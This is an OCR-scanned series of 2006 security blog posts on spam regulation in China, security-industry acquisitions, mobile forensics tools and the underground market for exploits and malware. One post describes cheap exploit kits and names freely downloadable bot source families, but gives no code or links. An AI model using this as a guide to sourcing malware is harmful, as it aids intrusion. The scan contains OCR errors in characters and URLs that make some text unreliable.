ttp://ddanchev. blogspot .com/2006/03/visualization-in-security-and-new. htm 
10. 
11. 
12. 
13. 
14. 
15. 
16. 
17. 
18. 
19. 
20. 
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2.4.10 Fighting Internet’s email junk through licensing (2006-04-14 19:18) 


Just came across this [1]story at [2]Slashdot, interesting approach : 


"China has introduced [3]regulationsthat make it illegal to run an email server without a 
licence. The new rules, which came into force two weeks ago, mean that most companies 
running their own email servers in China are now breaking the law. The new email licensing 
clause is just a small part of a new anti-spam law formulated by China’s Ministry of Information 
Industry (MII)." 


While the commitment is a remarkable event given [4]China’s booming [5]lnternet popu- 
lation - among the main reasons Google had to somehow [6]Jenter [7]China’s search market 
and take market share from Baidu.com - you don’t need a mail server to [8]disseminate spam 
and phishing attacks like it used to be in the old days. You [9]need [10]botnets, namely, going 
through [11]CME’s List, you would see how the majority of [12]today’s malware is loaded with 
build-in SMTP engine, even offline/in-transit/web email harvesting modules. 


You can often find China on the top of every recently released spam/[13]phishing/botnet 
trends summary, which doesn’t mean Chinese Internet users are insecure - just unaware. 
What you can do is educate the masses to secure the entire population, and stimulate the 
growth of the local security market that everyone is so desperately trying to tap into. 


Moreover, | doubt you can regulate the type of Internet users still trying to [14]freely ac- 
cess information, again with the wrong attitude in respect to security : 


"prohibiting use of email to discuss certain vaguely defined subjects related to ‘net- 
work security’ and ’ information security’, and also reiterate that emails which contain content 
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contrary to existing laws must not be copied or forwarded. Wide-ranging laws of this nature 
have been used against political and religous dissenters in the past." 


It’s like legally justifying the country’s [15]censorship practices through introducing the 
law, whereas | feel "network security" and “information security" [16]attacks outside the 
homeland get favored, compared to [17]internal ones, don’t you? 


Forbidden fruits turn into dangerous desires on the majority of occasions, and you just 
can’t control that, what’s left to censor it. 


Technorati tags: 


[18]Security, [19]Malware, [20]Spam, [21]Phishing, [22]China 


. http://yro.slashdot .org/yro/06/04/14/1459238.shtm 
. http://www.isc.org.cn/20020417/ca346007. htm 


. http://www. internetworldstats.com/articles/art045.ht 

. http: //ddanchev. blogspot .com/2006/02/chinese-internet-censorship-efforts.htm 

. http: //blog.searchenginewatch.com/blog/060403- 105558 

10. 
11. 

12. 

13. http://ddanchev.blogspot .com/2006/03/anti-phishing-toolbars-can-you-trust .htm 
14. 
15. http://edition.cnn.com/interactive/world/0603/explainer.china.internet/frameset .exclude.htm 
16. http: //ddanchev.blogspot.com/2006/02/hacktivism-tensions.htm 

17. 

18. 

19. 

20. 


21. http://technorati.com/tag/Phishing 
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22. http://technorati.com/tag/China 


2.4.11 Would somebody please buy this Titan 1 ICBM Missile Base? (2006-04-18 13:44) 
| feel that no matter how much you [1]try to bypass the [2]intermediary, it would continue 
to remain the place for anything auction - [3]Oday vulnerabilities, [4]Enigma encryption 


machines, and now a [5]Titan 1 ICBM Missile Base, is for sale at Ebay for the N time. Bari 
Hotchkiss listed the characteristics of the underground fortress as : 


- Hardened buildings built to withstand One megaton nuclear blast within three thousand feet 
- Wall thicknesses up to fourteen feet 
- Thousands of feet of connecting tunnels 


- Paved roads. Security fencing 


Trying to auction it [6Jagain, as he seems to own the [7]facility, it beats [8]The Bunker 
in respect to a wide range of physical/electronic attack based security possibilities, and has 
the potential to turn into the perfect data center with enough space for war rooms on every 
level. 


As [9]Gene Spafford once put it : 


"The only truly secure system is one that is powered off, cast in a block of concrete and 
sealed in a lead-lined room with armed guards - and even then | have my doubts." 
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and you would probably need a network connection of some kind to make use if it - 
that means insecurities posed out of open and hard to control external networks. 


I’ve once mentioned how [10]nuclear weapons aren’t the type of central military think- 
ing problem the way they used to be during the Cold War’s arms race, as there are many more 
emerging threats to consider, such as EMP, and [11]Space warfare, but that’s hell of an offer 
for a post-ColdWar underground complex, isn’t it? 


Some resources worth taking a look at : 


[12]19 Ways to Build Physical Security into a Data Center 
[13]Data Center : Securing Server Farms - Solution Reference Network Design 


[14]Data Center Security Associate Certificate Recommended Reading 


Technorati tags: 


[15]Security, [16]ICBM, [17]Data Center, [18]Missile Base 


1. http: //base.google.com/ 
2. http: //www.ebay.com/ 


3. http: //ddanchev. blogspot .com/2005/12/0bay-how-realistic-is-market-for.htm 


4. http: //ddanchev. blogspot .com/2006/04/wanna-get- yourself-portable-enigma.htm 


5. http://cgi.ebay.com/Titan-1-ICBM-Missile-Base-Located-in-Washington-State_WOQQitemZ4455060285QQcategoryZ1 


6. http: //slashdot.org/articles/04/03/14/0545202.shtm1?tid=103&tid=98kt id=99 


7. bttp://www.wired.com/news/culture/0, 1284, 47577, 00.htm 
8. http: //www.thebunker.net/our-facilities/data.htm 
9. http: //homes.cerias.purdue.edu/~spaf/ 
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10. http://ddanchev. blogspot .com/2006/02/who-needs-nuclear-weapons- anymore. htm 
11. http://ddanchev. blogspot .com/2006/03/is-space-warfare-arms-race-really.htm 
12. http://www.csoonline.com/read/110105/datacenter .htm 


17. http://technorati.com/tag/Datat+Cente 
18. http://technorati.com/tag/Missile+Base 


2.4.12 Spotting valuable investments in the information security market 
(2006-04-18 19:15) 


Back in [1]January | mentioned the possible acqusition of SiteAdvisor in my "[2]Look who’s 
gonna cash for evaluating the maliciousness of the Web?" post and it seems [3]McAfee have 
realized the potential of this social-networking powered concept on a wide scale, and recently 
[4]acquired [5]SiteAdvisor - this was meant to happen one way or another and with risk of 
being over-enthusiastic | feel | successfully spotted this one. 


Next to SiteAdvisor’s pros and cons that | commented on, | also provided a resourceful 
overview of some of the current malware crawling projects out there, to recently find out that 
WebRoot finally went public with the [6]Phileas spyware crawler, and that Microsoft’s [7]Strider 
Crawler came up with the [8]Typo-Control project - great idea as a matter of fact. What are 
some of the current/future trends in the information security industry? Are the recent flood of 
acquisitions the result of cheaper hardware and the utilization of open-source software, thus 
cutting costs to the minimum while the idea still makes it to the market? 


Have both, entry and exit barriers totally vanished so that anyone could get aspired of 
becoming a vendor without the brand at the first place? Excluding the big picture, it is 
amazing how uninformed both, end and corporate users are, yet another lack of incentive for 
security vendors to reach another level of solutions - if it ain’t broken, don’t improve it. 


Moreover, what would the effect be of achieving the utopian 100 % security on both, 
the market and the world’s economy? On one hand we have "the worst year" of [9]cybercrime, 
whereas [10]spending and [11]salaries are booming, and they should be as the not knowing 
how much security is enough, but trying to achieve the most secured state is a driving factor 


371 


for decades to come. 


The bottom line is, the more insecurities, the more security spending, the higher the 
spending, the higher the growth, and with increasing purchasing power, corporate R &D, and 
government initiatives you have a fully working economic model - going to war, or seeing 
terrorists everywhere is today’s driving force for military/intelligence spending compared to 
the "Reds are everywhere" propaganda from both camps of course, back in the Cold War 
period. Fighting with [12]inspired [13]bureaucrats is always an issue as well. 


The [14]Ansoff’s Product/Market Matrix often acts as the de-facto standard for develop- 
ing business opportunities, that is, of course, if you’re not lead by a visionary aim, promote 
an internal "everyday startup" atmosphere to stimulate creativity, or [15]benchmark against 
competitors. On the majority of occassions a security vendor is looking for ways to diversify 
its solutions’ portfolio, thus taking advantage of re-introduced product life cycles and new 
sources for revenues. 


While there should be nothing wrong with that given a vendor is actually providing a re- 
liable solution and support with it, | often argue on how marketable propositions centric 
business model is not good for the long-term competitiveness of the company in question. 


It’s the judgement and competitors [16]myopia that I’m talking about. In respect to the 
current information security market trends, or let’s pick up the anti virus solutions segment, 
that means loosing sight of the big picture with the help of the mainstream media - cross 
refferenced malware names, "yet another" malware in the wild, or supposed to be Russian 
hacker selling his soul for E-gold(cut the stereotypes here and go through the majority of recent 
statistics to see where all that phishing, soam and malware is coming from), is a common 
weakness of a possible decision-maker looking for acquisitions. Focusing on both, current 
trends, and current competitions is the myopia that would prevent you from sensing the 
emerging ones, the ones that would improve your competitiveness at any time of execution 
of course. 
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The way we have been witnessing an overal shift towards a services based world econ- 
omy in comparisson to a goods based one, in the informaiton security market services or 
solutions will inevitably profiliate in the upcoming future. When was the last time you heart 
someone saying "/ don’t need an anti-virus scanner, but an anti-virus solution, what’s yours 
and how is it differentiated from the others I’m aware of'? Un-informed decisions, quick and 
cheap way to get away with the "security problem", or being totally brainwashed by a vendor’s 
salesforce would result in enormous long-term TCO(total cost of ownership) problems, given 
someone actually figures a way to make the connection in here. 


Some time ago, | came across a great article at CSOOnline.com "[17]2 Vendor Mega- 
trends and What They Mean to You" giving insight on two trends, namely, consolidation of 
security providers and convergence - the interception between IT and physical security. And 
while it’s great in respect to covering these current trends, | feel the article hasn’t mentioned 
the 3rd one - Diversification. An excerpt : 


"One trend is consolidation. "“We’re seeing the bigger players buying out many of the 
smaller companies. And | think the largest of the security firms are looking to provide a 
full range of enterprise services," says C. Warren Axelrod, director of global information 
security at Pershing, a Bank of New York Securities Group company. "The larger firms, like 
Internet Security Systems, Symantec and Computer Associates, are buying in many areas 
to complement what they have. They’re basically vying for control of the security space." 
Axelrod is dead on, and consolidation is just as rampant among physical security vendors as 
itis in the IT world." 


| feel consolidation is happening mainly because different market segments are constantly 
getting crowded and mainly because it’s very, very hard to get a name in the information 
security market these days, so instead of run for your own IPO, compete against market 
players whose minor modification may ruin your entire idea, you’d better get acquired one 
way or another. [18]@stake is an example of how skilled HR runs away from the acquirer, at 
least for me counting the HR as the driving force besides the brand. 
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More from the article : 


"The second trend is convergence—the confluence of IT and physical security systems 
and vendors—which, in some sense, is another form of consolidation, only it’s happening 
across the line that historically divided those two worlds." 


Tangible security is often favored by investors as it targets the masses, and the most 
visible example besides perimeter based defenses are the hardware appliances themselves. 
These days, there isn’t a single anti virus, anti spam or anti spyware solution provider without 
a hardware appliance, but what’s to note is how their OEM agreements are still working and 
fully applicable, it’s all about greed, or let’s avoid the cliche and say profit maximization - 
whatever the market requires the vendors deliver! 


Very in-depth article, while | can argue that vendors are so desperate to "consolidate 
bids" on a national level, as they usually try to get as big part of the pie as possible. What’s 
else to note is that the higher the market transparency, the more competitive the environment, 
thus greater competition which is always useful for the final user. In respect to heterogenity 
and homogenity of security solutions, and all-in-one propositions, the trade-offs are plain 
simple, cut total TCO by using a single vendor, get your entire infrastructure breached into by 
an attacker that would sooner or later find a vulnerability in it - find the balance and try to 
avoid the myth that complexity results in insecurities, as it’s a unique situation every time. 


What we’re witnessing [19]acquisition-to-[20]solution turn-around periods of several months 
in response to an emerging market - the IM one, [21]mobile anti-virus scanners [22]seem 
[23]to be the "next big thing", whereas it would take quite some time for this segment to 
develop, still you’d better be among the first to respond to the interest and the fact that 
there are more mobile phones capable of getting infected with a virus, than PCs out there - 
3G, 4G, mobile banking would fuel the growth even more, and these are just among the few 
issues to keep in mind. In a previous [24]post, | also mentioned on a creative use of security 
intelligence information in Sophos’s [25]Zombie Alert service, and a product-line extensions, 
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namely McAfee’s bot killing system. What no one pictured would happen is emerging these 
days - vulnerabilities turning into IP and the overal commercialization of the [26]security 
vulnerabilities market, and [27]getting paid for getting hacked is a growing trend as well - 
much more’s to come for sure. 


The secrets to successful acquisitions? 


- retain the HR that came with it, and better put something on the table at the first place 


- don’t try to cannibalize the culture there, Flickr is the perfect example out of the secu- 
rity market 


- go beyond the mainstream media sources, and PR releases, uSe open source competi- 
tive intelligence tools in order not to miss an opportunity 


- attend as much cons as possible to keep track of who’s who and where’s the industry 
heading to 


- cost-effectively keep in touch with researchers, and an eye on their blogs, you never 
know who would be your early warning system for business development ideas 


Try to stay on the top of security, not in line with it. 


Technorati tags: 


[28]Security, [29]Information Security, [30]SiteAdvisor, [31]McAfee, [32]lnvesting, [33]In- 
vestment, [34]Market Trends, [35]Economics 


1, ftip://danchev. blogspot .con/2006/04/ jamuaxys-security-streans bal 
2, hetp://adanchev blogspot. con/2006/02/Look- vhos~ gonna cash-for- evaluating tal] 
3, http://mv.ncafee.con/us/about/press /consuner/2006/20060403_050000_q. htm 
4. 
5. 


ttp://blog.siteadvisor.com/2006/04/taking_siteadvisor_to_the_next.shtm 


ttp://www.siteadvisor.com/ 
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6. http://www. webroot . com/resources/phileas 

7. http://research.microsoft.com/sm/strider/ 
8. http: //research. microsoft. com/Typo-Patrol/ 
9. 
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. http: //news.bbc.co.uk/2/hi/americas/4655196. st: 
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32. http://technorati.com/tag/Investing 


2.4.13 Digital forensics - efficient data acquisition devices (2006-04-20 17:23) 


[1]Digital forensics have always been a hot market segment, whereas the need for a reliable 
network based forensics model given main [2]Internet’s insecurities such as [3]source address 
spoofing and the lack of commonly accepted security events reporting practices is constantly 
growing as well. Information acqusition, analysis and interpretation in the most reliable and 
efficient way is often among the desired outcome - and of course figure out what has been 
happenning at a given historical moment in time or in real-time if applicable. 


In a previous post related to "[4]Detecting intruders and where to look for" | mentioned 
lots of resources regarding the topic, and tools to take advantage of, if in need. In respect 
to cell phones and various related [5]privacy issues, excluding the physical forensic analysis 
that could be successfully performed, there’s a growing discussing on whether a "Suspect’s" 
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physical location should be revealed though a mobile-phone carrier - segmented requests are 
the most efficient and socially-conscious ones | think. 


Today | came across to "[6]Logicube CellIDEK" a portable handset data extraction kit : 


"The portable CelIDEK® acquires data from over 160 of the most popular cell phones 
and PDA’s. Built to perform in the field (not just in the lab), investigators can immediately 
gain acces to vital information. This saves days of waiting for crucial data to come back 
from a crime lab. The CellIDEK software automatically performs forensic extraction of the 
following data: Handset Time and Date, Serial Numbers (IMEI, IMSI), Dialed Calls, Received 
Calls, Phonebook (both handset and SIM), SMS (both handset and SIM), Deleted SMS from SIM, 
Calendar, Memos, To Do Lists, Pictures, Video, and Audio." 


Nothing surprising as there are many other freeware applications/ways to do [7]cell phone 
forensics ([8]full list can be found at Sergio Hernando’s blog), but what made me an im- 
pression was its usefulness by covering over 160 models, portability due to its size and 
capabilities, and that up to 40 adapters may be stored in the system’s built-in rack. Some 
challenges | see to today’s forensic investigators are the sophistication of publicly available 
encryption/steganographic tools, the Internet acting as a online HDD opening opportunities 
for dead-drop places, and communications that went over [9]covert channels. 


On my wislist however, has always been the company’s [10]Forensic MD5, as it basi- 
cally "swallows" data in a timely manner - a bad toy in the hands of a [11 ]insider going beyond 
average types of removable media, and in moments where minutes count. As a matter of fact, 
a forensic investigator’s sophistication and expertise doesn’t really count when the [12]Mafia 
is still catching up on how to encrypt. Still, I’m convinced how some of his "operatives" are 
into far more sophisticated methods of communication than he is. 
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Check out some more resources, and case studies on the topic as well : 


[13]How to Become a Cyber-Investigator 

[14]SANS Reading Room - Forensics 

[15]Digital Forensics Tool Testing Images 

[16]Computer Forensics for Lawyers 

[17]Forensic Analysis of the Windows Registry 

[18]Forensic Computing from a Computer Security perspective 
[19]Guidelines on PDA Forensics 

[20]Forensic Examination of a RIM (BlackBerry) Wireless Device 
[21]WebMail Forensics 

[22]iPod Forensics 

[23]Digital Music Device Forensics 

[24]Forensics and the GSM mobile telephone system 

[25]List of Printers Which Do or Don’t Print Tracking Dots 


[26]Metasploit Anti-forensics homepage 


UPDATE - Sites that picked up the story 


[27 ]LinuxSecurity.com 
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2.4.14 The anti virus industry’s panacea - a virus recovery button (2006-04-20 20:07) 


[1]Just when | thought I’ve seen everything when it comes to [2]malware, | was wrong as a PC 
vendor is trying to desperately position itself as one offering a feeling of security with the idea 
to strip its product and lower the customer price. The other day | came across to a fancy ad 
featuring Lenovo’s ThinkVantage [3]Virus Recovery Button, and promoting its usefulness even 
when there’s no AV solution in place : 
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"Rescue and Recovery is a one button recovery and restore solution that includes a set 
of self recovery tools to help users diagnose, get help and recover from a virus or other system 
crashes quickly, even if the primary operating system will not boot and you are remote from 
your support team." 


The [4]video ad is indeed fascinating, and while their [5]Embedded Security Subsystem 
2.0 "locks your sensitive data behind hardware-based encryption", you'd better take advan- 
tage of their [6]utilities options and try to avoid such a weak positioning in respect to malware. 
The Virus Recovery Button seems to be directly targeting the masses and totaly removing the 
complexity issue by introducing a button-based solution to malware - dangerous as backups 
and their idea could have proven useful during the first [7]generations of malware. 


[8]Anti virus signatures, response time, and various other [9]proactive malware preven- 
tion approaches such as, IPS, buffer overflow protection are among today’s most widely 
discussed approaches when dealing with malware, and of course, [10]the principle of least 
privilege to user accounts. But why the anti virus button when it can be an anti-hacker one? 
| feel they’d better stick to their OEM agreements and find other ways to achieve competive 
advantage in pricing than providing a false sense of security. 
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In my recent "[11]Malware - future trends" research | mentioned on the fully realistic 
scenario of having your security solution turn into a security problem itself. While this is 
nothing new, in this case we have a misjudged security proposition, as recovering to a 
pre-infection state doesn’t necessariry mean confidentiality of sensitive personal/financial 
information wouldn’t be breached by the time the user is aware of the infection, if it ever 
happens of course. 


Moreover, Lenovo was recently under [12]scrutiny as "The U.S.-China Economic Security 
Review Commission (USCC) argues that a foreign intelligence like that of the Communist 
Party of China (CPC) can use its power to get Lenovo to equip its machines with espionage 
devices. Lenovo has strongly declined that it is involved in any such activities", and while they 
eventually reached a consensus on using the machines on unclassified systems only, it doesn’t 
mean they aren’t exposed to a wide variety of threats going beyond China backdooring them, 
such as [13]Zotob over border-screening systems at airports. 


As a matter of fact, the rival PC/notebook propositions might still be owned by U.S com- 
panies, but are mostly assembled in China these days - too much hype for nothing. 


UPDATE - Sites that picked up the post 


[14]LinuxSecurity.com 


[15]MalwareHelp.org 
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2.4.15 Why’s that radar screen not blinking over there? (2006-04-24 15:39) 


Two days ago, the Russian News & Information Agency - Novosti, reported on how "[1]Russian 
bombers flew undetected across Arctic" more from the article : 


"Russian military planes flew undetected through the U.S. zone of the Arctic Ocean to 
Canada during recent military exercises, a senior Air Force commander said Saturday. The 
commander of the country’s long-range strategic bombers, Lieutenant General Igor Khvorov, 
said the U.S. Air Force is now investigating why its military was unable to detect the Russian 
bombers. They were unable to detect the planes either with radars or visually," he said." 
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[2]SpaceWar.com, and [3]several other sites/[4]Jagencies also picked up the story, still 
its truthfulness, excluding the lack of coverage, can always be questioned, as "by the end of 
the year, two more [5]Tu-160s will be commissioned for the long-range strategic bomber fleet, 
Khorov said." So, while | agree with him on the visual confirmation issue, such an achievement 
is hell of an incentive for commissioning more planes, isn’t it? Moreover, should the what 
used to be, the world’s largest radar - [6]The Over-The-Horizon Backscatter Radar have been 
[7]scrapped given Iran’s (and not only) [8]nuclear ambitions, or the ongoing [9]space warfare 
doctrine would be the logical successor in here? 


Let’s for instance assume it actually happened, and take the reverse approach - it actu- 
ally happened in Russia too, back in 1987, and it wasn’t a senior air force commander that did 
it, if he did, but 19 years old [10]Mathias Rust who landed on the Red Square itself. 


More details will follow for sure, so stay tuned, meanwhile take a look at Google Earth’s 
Community [11]spot link on Mathias’s landing. 


UPDATE 


[12]Nice article on the topic, and a great quote as well "Scanning containers full of sneakers 
for a ‘nuke in a box’ is not a really thoughtful thing." 


Technorati tags: 


[13]Military, [14]Radar, [15]Bomber 
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2.4.16 25 ways to distinguish yourself - and be happy? (2006-04-24 17:45) 


Totally out of the security world, yet very relevant inspirational tips for all readers feeling 
down, or looking for more sources of self-esteem. I’ve always believed that among the most 
important key factors for leadership is the ability to know yourself, and to understand the time 
dimensions of failure - it’s just a temporary event whenever it happens to occur. | also often 
debate on the pros and cons of corporate citizenship with friends, and try to emphasize on the 
mobility of today’s workforce - at least the way | see it. Is there any use of such an approach 
these days, and how should an enterprise go when attracting and retaining it’s most valuable 
HR assets? Does the individual really count at the bottom line? 


| think assets with attitude are the most valuable ones, given they never stop self-developing 
themselves. Going back to this very positive "[1]manifesto" "You don’t have to motivate 
me, just stop demotivating me" type of attitude is what you can greatly enjoy in these tips. 
Extremely well written key points, especially that "being part of the commodity crowd erodes 
your value", so true. These get [2]updated all the time, so add them to your own unique ways 
of distinguishing yourself - and being happy? :) 


01. Care as if it’s your own 


02. Do your daily work with passion 
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03. Build strong relationships 

04. Dream big! 

05. Set the right expectations 

06. Ask for help 

07. Celebrate small victories 

08. Set higher standards 

09. Know your values 

10. Pursue right memberships 

11. Help people help themselves 
12. Be a reader 

13. Plan by outcomes 

14. Think long-term 

15. Embrace uncertainty with ease 
16. Ask the right questions 

17. Engage with a coach 

18. Re relevant 

19. Get back on your feet fast! 

20. Lead a volunteer effort 

21. Balance innovation and continuous improvement 
22. Learn to sell - your skills, not your soul or at least not on parts 
23. Learn systems thinking 

24. Walk away from free 


25. Influence the influencers 


1. http://www. changethis.com/17.25WaystoDistinguish/download/?screen=0kaction=download_manifesto 


2. http://blog.1lifebeyondcode.com/blog/Distinguishyourself 
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2.4.17 Wild Wild Underground (2006-04-25 13:05) 


Where’s the real underground these days, behind the shadows of the [1]ShadowCrew, the 
revenge of the now, for-profit script kiddies, or in the slowly shaping real Mafia’s online 
ambitions? Moreover, is all this activity going on behind the Dark Web, or the WWW itself? 
Go through this fresh overview, emphasizing on today’s script kiddies, Odays as a commodity, 
malware and DDoS on demand on the WWW itself, and perhaps a little bit of vendors’ tolerated 
FUD. 


In a previous post, | mentioned on the existence of the [2]International Exploits Shop, 
the Xshop, basically a web module where Odays, and service support in terms of videos, 
PHP-based configuration etc. are provided to anyone willing to get hold of a Oday/zero-day 
vulnerability - scary stuff, yet truly realistic concept that’s directly bypassing today’s infome- 
diaries that purchase vulnerabilities. 


| must admit | didn’t do homework well enough to figure out that the Hack Shop has 
been changing quite some places for the last two years and having offered many other 
vulnerabilities, going beyond what | came across to two months ago - the Internet offers a 
much wider set of potential buyers than from the three informediaries for the time being. As 
a reader gave me a hint, in the future images would protect that type of pages from crawling 
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activities, and it’s interesting to note that previous versions of the shop were doing exactly 
the same, while the last one | got tipped about, was using text on its pages. What’s also 
important to mention is that these are the public propositions, ones placed on the WWW, and 
not the Dark Web, the one behind closed doors. Last month, [3]Sophos [4]mentioned on the 
existence of a multi-exploit kit for an unbelievably cheap price : 


"A Russian website is selling a spyware kit for $15. The website promises an easy-to- 
deploy spyware that only requires users to trick their victims into visiting a malicious website. 
The website even offers technical support. Carole Theriault, senior security consultant at 
Sophos, says such websites invite script kiddies and other unskilled would-be hackers into the 


world of cybercrime for profit." 


Rather interesting, [5]WebSense Security Labs looked further, came up with the screen- 
shots from the site itself, cut the last screenshot you can clearly see here (Disable adobe 
acrobat web capture, Disable opera user, Kill frame, Location lock, Referrer lock) but again 
spread the rumour of multi-exploit kit for sale at $15, of course for entering the for-profit 
cyber crime business - a little bit of FUD, sure, but the sellers aren’t still that very desperate | 


think. 
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So, | decided to look even further and now can easily conclude - it depends where you’re 
buying it from, | mean even the official site sells it at a price that way too high for an average 
script kiddie to get hold of multi-exploits pack - whether outdated or not can be questioned 
as well. So, the kit officially goes for $300 and, $25 for updates, | also came across it for 
$95, but | bet they are a lot of people looking for naive wannabe exploiters out there. As you 
can see on these screenshots, it has the ability to encrypt HTML pages, parts of the page, and 
take precautions for curious folks trying to figure out more about the page in question, and it 
makes me wonder on how well would malicious HTML detection would perform here, if it does? 


What’s the outcome - script kiddies with attitude are basically compiling toolsets of old 
exploits and building all-in-one malware kits. As you can even see, they are lazy enough 
not to keep an eye on its detection status, a sign of "growing" business for sure, yet the 
"underground" seems to [6]Ph34r going to the Opera , so take your note. 


| recently came across to a great article "[7]The Return of the Web Mob" you can find 
more details on the topic as well, such as : 
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"| saw one case where an undetectable Trojan was offered for sale and the buyers were 
debating whether it was worth the price. They were doing competitive testing to ensure it 
actually worked as advertised," said Jim Melnick, a member of Dunham's team." 


"In November 2005, Mashevsky discovered an attempt to hijack a botnet. [The] net- 
work of infected computers changed hands three times in one day. Criminals have realized 
that it is much simpler to obtain already-infected resources than to maintain their own botnets, 
or to spend money on buying parts of botnets which are already in use," he said." 
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"Dunham, who frequently briefs upper levels of federal cyber-security authorities on emerging 
threats, said there have been cases in Russia where mafia-style physical torture has been 
used to recruit hackers. If you become a known hacker and you start to cut into their profits, 
they’ll come to your house, take you away and beat you to a pulp until you back off or join 
them. There have been documented cases of this," Dunham said." 


While doing a recent research across the Russian and the Chinese domain, | came to 
the conclusion that every local scene has it’s own underground, and that those that go as 
publicly as some do at the bottom line, make the headlines. However, Chinese users being 
[8]collectivists, are still at the heroic stage of cyber dissidents slowly turning into wannabe 
hackers, and they have a chain of command, so to speak, that | can argue is more powerful 
than thought to be "well organized" like the ones in Russia, being [9]individualists. There are 
even marketing campaigns going on in the form of surveys, trying to measure the bargaining 
point for [10]Oday vulnerabilities | guess. This one says : 


How much would you be willing to pay for an exploit? 
$100-300 

$300-500 

$500-1000 

over $1000 

we write our own exploits :D 


| get them for free 
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and offers trying to even add value to the purchase by offering a SMS flooder for free if 
you purchase the exploit. | mean, if you start thinking logically, bypassing the current 
intermediaries and their moody programs compared to one-to-one communication model with 
a possible buyer - the entire idea behind [11]disintermediation is the method of choice. Have 
Odays turned into an uncontrolled commodity that has to be somehow, at least, coordinated?! 


In my recent [12]Future trends of malware research, | mentioned how open-source mal- 
ware would inevitably dominate, and how the concept will put even more pressure on AV 
vendors to figure out how to protect from unknown malicious code - proactively. What | came 
across to was, customer-centric malware propositions, special features increase or decrease 
the final price, botnet sources for free download/purchase if modifications are made, free 
advices coming with the purchase, on demand vulnerabilities, spamming or spam harvesting 
services on demand, price comparison for malware samples, [13]rootkits-enabled pieces of 
malware indeed show an increase of growth, DDoS on demand services are usually proposed 


with 30 mins of service "demo". 
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Bot’s sources are also annoyingly available at the click of a button, as | verified over 20 
working links with archives averaging 75MB. 


Popular ones : 


urxbot, spybot, sdbot, rxbot, rbot, phatbot, litmus, gtbot, forbot, evilbot, darkirc, agobot, 
jbot, microbot, blueyebot, icebot, q8bot, happybot, htmlinfectbot, gsys, epicbot, darkbot, 
r0Ofuz, panicattack 


Who’s to blame? It’s not Russia for sure, and if it was it would mostly have to do with 
enforcement of current laws, yet the global media tends to stereotype to efficiently meet 
deadlines, instead of figuring out what is going on at the bottom line. When the U.S sees 
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attacks coming from Chinese networks, it doesn’t mean it’s Chinese hackers attacking the U.S, 
but could be that sick North Korean ones are trying to increase tensions by [14]spoofing their 
identities. Moreover, as I’ve mentioned it is logical to conclude that there are "undergrounds" 
on a national level, for instance for the last couple of years there’s been a steady growth of 
defacements and phishing attackers from Brazil, Turkey, and of course China, | rarely come 
across anything else but "mention Russia and get over it" attitude. 


In respect to the Chinese "underground", according a report not to be disclosed, and so 
I’m not as it’s fully loaded with impressive information, the Chinese underground back in 2002 
used to aggressively attack U.S government’s and military targets while drinking Coke from 
McDonald’s themed Coke glass :) courtesy of the [15]China Eagle Union themselves. Their 
[16]actions in coordination with the [17]Honker Union of China, for instance, played a crucial 
role in active hacktivism and continue playing it even today. 


Like it or not, the average script kiddie, or can we say sophisticated Generation Y teenagers, 
are well too informed, and obviously sellers of malicious services such as DDoS and malware 
on demand, than it used to be years ago. | feel it’s not their knowledge that’s increasing, but 
the number of connected computers with security illiterate users aiming to put themselves in 
a "stealth mode" while online in order not to get hacked, or as a friend put it, running in root 
mode and hiding behind firewalls - ah, the end user. 
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You can [18]digitally fingerprint a malicious code when you have it, that’s normal, but 
what happens when you don’t, can you fight the concepts themselves? Ken Dunham com- 
ments on "mafia-style physical torture" are the reflection of people naming their malware 
MyDoom and begging for botnets if you take your time to go through the quotes from [19]An- 
cheta’s [20]case. 


Don’t ph34r the teenagers, ph34r their immaturity, and ongoing recruitment practices 
by the [21]Mafia itself. 


. http://www. businessweek.com/magazine/content/05_22/b3935001_mz001 .ht 
. http: //ddanchev. blogspot .com/2006/03/wheres-my-Oday-please.htm 


. http://www. opera.com/download/index.dml?custom=yes 
. http://www. eweek.com/article2/0, 1895, 1947561,00.asp 
. http://en.wikipedia.org/wiki/Collectivism 


ttp://en.wikipedia.org/wiki/Individualism 
. http: //ddanchev.blogspot .com/2005/12/0bay-how-realistic-is-market-for.htm 
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20. http://news .findlaw. com/hdocs/docs/cyberlaw/usanchetaind. pdf 
21. http://en.wikipedia. org/wiki/Mafia 
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2.4.18 In between the lines of personal and sensitive information (2006-04-26 09:52) 


[1]In a previous post, "[2]Give it back!" | mentioned the ongoing re-classification of declassified 
[3]information and featured some publicly known sources for information on government 
secrecy. Today | came across to a news item relating to the topic in another way, "[4]States 
Removing Personal Data from Official Web Sites", more from the article : 


"At least six states use redaction software, which digitally erases information. It can be 
tailored to excise nine-digit entries such as SSNs. Chips Shore, circuit court clerk for Florida’s 
Manatee County, removed SSNs and bank account numbers from 3 million public records on 
the Web site. Another 2.5 million court records were redacted before going online." 


That’s an interesting way to fight the problem from the top of it, namely [5]personal 
data security breaches that [6]never stop growing, but | wish they came up with the practice 
either [7]by default years ago, or understand today’s dynamics of the threat. Even if they 
start implementing this on a wide scale, it doesn’t mean [8]Jidentity theft would stop occuring, 
or that [9]phishing attacks wouldn’t trick them into giving the complete details. Having im- 
plemented a process for securely storing, accessing and trasfering such sensitive customers’ 
bank data, often results in complexities, but using "redaction software" when you can actually 
take advantage of a [10]risk management solution, isn’t the smartest move here - yet again 
that’s the effect of today’s dynamics and ever-changing attack vectors. What’s the point of 
putting so much efforts into sanitizing the data before going online with it, when an outsourcer, 
or an employee whose responsibilities include working with it will somehow expose it? 


Wait, forgot the naive customer who’s still taking all the phishing emails received "per- 
sonally". Don’t think SSNs and bank accounts "redaction", but insiders and storage/database 
security. 


In respect to removing sensitive information from the Web, | feel the unability of suc- 
cessfully classifying information and balancing the accountability in front of society to a 
certain extend, generates contradictive responses. If you try to take down a document that 
has been somehow listed on the Internet or available in digital format, what you’re doing is 
actually inspiring people to disseminate it, that include news agencies as well, so make sure 
it doesn’t appear there at the first place. Recent cases such as these : 
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"[11]DOD removes missile defense system report from Web site" 
"[12]NORAD orders Web deletion of transcript" 


"[13]Air Force One data removed from Web Site revealed details of security measures 
on president’s jets" 


"[14]Leaks of Military Files Resume" 


bring more insights on the issue. It is well known that the entire Chinese information 
warfare doctrine is backed up by the NCW visions of U.S’s military - they still have [15]Sun 
Tzu’s legacy though - and that Al Qaeda’s manuals actually quote U.S military’s documents. 
If you know what exactly you’re looking for, you will find it one way or another, just make sure 
information-sharing doesn’t end up as an information leakage event. 


Going beyond achieving the balance between usability, accountability, and secrecy, | 
also feel that disinformation and deception are reasonably taking place as well, given the 
reader is actually identified and consequently influenced. 
